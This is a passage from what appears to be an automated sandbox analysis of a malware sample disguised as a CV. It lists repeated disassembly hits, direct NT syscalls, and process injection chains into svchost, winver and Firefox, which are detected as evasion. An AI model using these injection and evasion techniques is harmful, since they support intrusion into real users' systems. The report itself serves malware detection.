                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAEB1D mov eax, dword ptr fs:[00000030h]1_2_03AAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAEB1D mov eax, dword ptr fs:[00000030h]1_2_03AAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAEB1D mov eax, dword ptr fs:[00000030h]1_2_03AAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAEB1D mov eax, dword ptr fs:[00000030h]1_2_03AAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAEB1D mov eax, dword ptr fs:[00000030h]1_2_03AAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAEB1D mov eax, dword ptr fs:[00000030h]1_2_03AAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAEB1D mov eax, dword ptr fs:[00000030h]1_2_03AAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAEB1D mov eax, dword ptr fs:[00000030h]1_2_03AAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAEB1D mov eax, dword ptr fs:[00000030h]1_2_03AAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2CB7E mov eax, dword ptr fs:[00000030h]1_2_03A2CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE4B4B mov eax, dword ptr fs:[00000030h]1_2_03AE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE4B4B mov eax, dword ptr fs:[00000030h]1_2_03AE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B02B57 mov eax, dword ptr fs:[00000030h]1_2_03B02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B02B57 mov eax, dword ptr fs:[00000030h]1_2_03B02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B02B57 mov eax, dword ptr fs:[00000030h]1_2_03B02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B02B57 mov eax, dword ptr fs:[00000030h]1_2_03B02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC6B40 mov eax, dword ptr fs:[00000030h]1_2_03AC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC6B40 mov eax, dword ptr fs:[00000030h]1_2_03AC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFAB40 mov eax, dword ptr fs:[00000030h]1_2_03AFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD8B42 mov eax, dword ptr fs:[00000030h]1_2_03AD8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A28B50 mov eax, dword ptr fs:[00000030h]1_2_03A28B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADEB50 mov eax, dword ptr fs:[00000030h]1_2_03ADEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A38AA0 mov eax, dword ptr fs:[00000030h]1_2_03A38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A38AA0 mov eax, dword ptr fs:[00000030h]1_2_03A38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A86AA4 mov eax, dword ptr fs:[00000030h]1_2_03A86AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3EA80 mov eax, dword ptr fs:[00000030h]1_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3EA80 mov eax, dword ptr fs:[00000030h]1_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3EA80 mov eax, dword ptr fs:[00000030h]1_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3EA80 mov eax, dword ptr fs:[00000030h]1_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3EA80 mov eax, dword ptr fs:[00000030h]1_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3EA80 mov eax, dword ptr fs:[00000030h]1_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3EA80 mov eax, dword ptr fs:[00000030h]1_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3EA80 mov eax, dword ptr fs:[00000030h]1_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3EA80 mov eax, dword ptr fs:[00000030h]1_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B04A80 mov eax, dword ptr fs:[00000030h]1_2_03B04A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A68A90 mov edx, dword ptr fs:[00000030h]1_2_03A68A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6AAEE mov eax, dword ptr fs:[00000030h]1_2_03A6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6AAEE mov eax, dword ptr fs:[00000030h]1_2_03A6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A86ACC mov eax, dword ptr fs:[00000030h]1_2_03A86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A86ACC mov eax, dword ptr fs:[00000030h]1_2_03A86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A86ACC mov eax, dword ptr fs:[00000030h]1_2_03A86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A30AD0 mov eax, dword ptr fs:[00000030h]1_2_03A30AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A64AD0 mov eax, dword ptr fs:[00000030h]1_2_03A64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A64AD0 mov eax, dword ptr fs:[00000030h]1_2_03A64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6CA24 mov eax, dword ptr fs:[00000030h]1_2_03A6CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5EA2E mov eax, dword ptr fs:[00000030h]1_2_03A5EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A54A35 mov eax, dword ptr fs:[00000030h]1_2_03A54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A54A35 mov eax, dword ptr fs:[00000030h]1_2_03A54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ABCA11 mov eax, dword ptr fs:[00000030h]1_2_03ABCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6CA6F mov eax, dword ptr fs:[00000030h]1_2_03A6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6CA6F mov eax, dword ptr fs:[00000030h]1_2_03A6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6CA6F mov eax, dword ptr fs:[00000030h]1_2_03A6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADEA60 mov eax, dword ptr fs:[00000030h]1_2_03ADEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AACA72 mov eax, dword ptr fs:[00000030h]1_2_03AACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AACA72 mov eax, dword ptr fs:[00000030h]1_2_03AACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A36A50 mov eax, dword ptr fs:[00000030h]1_2_03A36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A36A50 mov eax, dword ptr fs:[00000030h]1_2_03A36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A36A50 mov eax, dword ptr fs:[00000030h]1_2_03A36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A36A50 mov eax, dword ptr fs:[00000030h]1_2_03A36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A36A50 mov eax, dword ptr fs:[00000030h]1_2_03A36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A36A50 mov eax, dword ptr fs:[00000030h]1_2_03A36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A36A50 mov eax, dword ptr fs:[00000030h]1_2_03A36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40A5B mov eax, dword ptr fs:[00000030h]1_2_03A40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40A5B mov eax, dword ptr fs:[00000030h]1_2_03A40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]1_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]1_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]1_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]1_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]1_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]1_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]1_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]1_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]1_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]1_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]1_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]1_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]1_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A309AD mov eax, dword ptr fs:[00000030h]1_2_03A309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A309AD mov eax, dword ptr fs:[00000030h]1_2_03A309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB89B3 mov esi, dword ptr fs:[00000030h]1_2_03AB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB89B3 mov eax, dword ptr fs:[00000030h]1_2_03AB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB89B3 mov eax, dword ptr fs:[00000030h]1_2_03AB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ABE9E0 mov eax, dword ptr fs:[00000030h]1_2_03ABE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A629F9 mov eax, dword ptr fs:[00000030h]1_2_03A629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A629F9 mov eax, dword ptr fs:[00000030h]1_2_03A629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC69C0 mov eax, dword ptr fs:[00000030h]1_2_03AC69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03A3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03A3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03A3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03A3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03A3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03A3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A649D0 mov eax, dword ptr fs:[00000030h]1_2_03A649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFA9D3 mov eax, dword ptr fs:[00000030h]1_2_03AFA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB892A mov eax, dword ptr fs:[00000030h]1_2_03AB892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC892B mov eax, dword ptr fs:[00000030h]1_2_03AC892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE908 mov eax, dword ptr fs:[00000030h]1_2_03AAE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE908 mov eax, dword ptr fs:[00000030h]1_2_03AAE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ABC912 mov eax, dword ptr fs:[00000030h]1_2_03ABC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A28918 mov eax, dword ptr fs:[00000030h]1_2_03A28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A28918 mov eax, dword ptr fs:[00000030h]1_2_03A28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A56962 mov eax, dword ptr fs:[00000030h]1_2_03A56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A56962 mov eax, dword ptr fs:[00000030h]1_2_03A56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A56962 mov eax, dword ptr fs:[00000030h]1_2_03A56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A7096E mov eax, dword ptr fs:[00000030h]1_2_03A7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A7096E mov edx, dword ptr fs:[00000030h]1_2_03A7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A7096E mov eax, dword ptr fs:[00000030h]1_2_03A7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD4978 mov eax, dword ptr fs:[00000030h]1_2_03AD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD4978 mov eax, dword ptr fs:[00000030h]1_2_03AD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ABC97C mov eax, dword ptr fs:[00000030h]1_2_03ABC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB0946 mov eax, dword ptr fs:[00000030h]1_2_03AB0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B04940 mov eax, dword ptr fs:[00000030h]1_2_03B04940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A30887 mov eax, dword ptr fs:[00000030h]1_2_03A30887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ABC89D mov eax, dword ptr fs:[00000030h]1_2_03ABC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFA8E4 mov eax, dword ptr fs:[00000030h]1_2_03AFA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6C8F9 mov eax, dword ptr fs:[00000030h]1_2_03A6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6C8F9 mov eax, dword ptr fs:[00000030h]1_2_03A6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5E8C0 mov eax, dword ptr fs:[00000030h]1_2_03A5E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B008C0 mov eax, dword ptr fs:[00000030h]1_2_03B008C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A52835 mov eax, dword ptr fs:[00000030h]1_2_03A52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A52835 mov eax, dword ptr fs:[00000030h]1_2_03A52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A52835 mov eax, dword ptr fs:[00000030h]1_2_03A52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A52835 mov ecx, dword ptr fs:[00000030h]1_2_03A52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A52835 mov eax, dword ptr fs:[00000030h]1_2_03A52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A52835 mov eax, dword ptr fs:[00000030h]1_2_03A52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6A830 mov eax, dword ptr fs:[00000030h]1_2_03A6A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD483A mov eax, dword ptr fs:[00000030h]1_2_03AD483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD483A mov eax, dword ptr fs:[00000030h]1_2_03AD483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ABC810 mov eax, dword ptr fs:[00000030h]1_2_03ABC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ABE872 mov eax, dword ptr fs:[00000030h]1_2_03ABE872
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003BA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_003BA66C
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003A81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003A81AC
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003A8189 SetUnhandledExceptionFilter,0_2_003A8189

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\winver.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: NULL target: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: NULL target: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeThread register set: target process: 8032Jump to behavior
                Source: C:\Windows\SysWOW64\winver.exeThread APC queued: target process: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2FF9008Jump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003BB106 LogonUserW,0_2_003BB106
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_00383D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00383D19
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003C411C SendInput,keybd_event,0_2_003C411C
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003C74BB mouse_event,0_2_003C74BB
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe"Jump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeProcess created: C:\Windows\SysWOW64\winver.exe "C:\Windows\SysWOW64\winver.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003BA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_003BA66C
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003C71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_003C71FA
                Source: CV Lic H&S Olivetti Renzo.exe, DIRZUznVUfWlad.exe, 00000005.00000002.4144846532.0000000001220000.00000002.00000001.00040000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000005.00000000.1954893043.0000000001220000.00000002.00000001.00040000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000007.00000000.2107688041.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: DIRZUznVUfWlad.exe, 00000005.00000002.4144846532.0000000001220000.00000002.00000001.00040000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000005.00000000.1954893043.0000000001220000.00000002.00000001.00040000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000007.00000000.2107688041.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
